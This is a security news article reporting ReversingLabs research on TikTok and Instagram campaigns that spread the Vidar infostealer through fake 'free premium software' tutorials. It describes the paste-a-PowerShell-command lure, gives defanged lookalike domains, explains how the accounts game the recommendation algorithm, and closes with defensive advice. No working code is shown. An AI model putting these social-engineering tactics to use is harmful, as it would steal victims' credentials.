Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials for unlocking premium software for free.
New analysis from ReversingLabs describes two campaigns that game the platforms' recommendation algorithms to reach large audiences, both funneling viewers to sites peddling fake free software such as Spotify Premium.
Vidar is a long-running infostealer sold as a service for a $300 lifetime license, harvesting credentials, financial data and authentication tokens. A refresh last October made it stealthier.
The clips racked up real traction, with one tutorial drawing more than 100,000 views.
The first campaign ran through near-identical accounts with names like "windows.tips" and a blue-and-white crown icon that aped the official Windows profile. An AI-voiced clip walked viewers through opening PowerShell and pasting a command.
That PowerShell command silently downloaded and ran a script from a lookalike domain, msget[.]run, that some mistook for a Microsoft address. The file it pulled down is Vidar.
To climb the algorithm, the accounts chased saves and shares rather than likes, the interactions platforms weigh most heavily. One video logged nearly 1700 saves alongside its six-figure view count.
Curiosity Bait in the Comments
The second campaign looked less polished, ReversingLabs said. Ordinary-looking accounts post music-backed clips flaunted free Spotify Premium, then baited the comments, sometimes asking viewers to reply with a word like "ok" to trigger a direct message with instructions.
Those instructions pointed to sites such as d4ug[.]site that promised free games and AI tools but gate the download behind survey after survey. ReversingLabs could not get past them, so the final payload here stayed unconfirmed.
The approach is sticky, and like any social engineering, it is hard to police: creators can delete comments that warn others, and the firm's attempts to report the posts to Instagram were rejected.
To defend against this threat, ReversingLabs urged organizations to:
-
Audit who holds software-install privileges and what they are installing
-
Refresh phishing training to cover social feeds, not just email and text
-
Encourage staff to report suspicious posts, even on personal accounts
"The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," the company wrote. "Remaining diligent can help everyone be safer."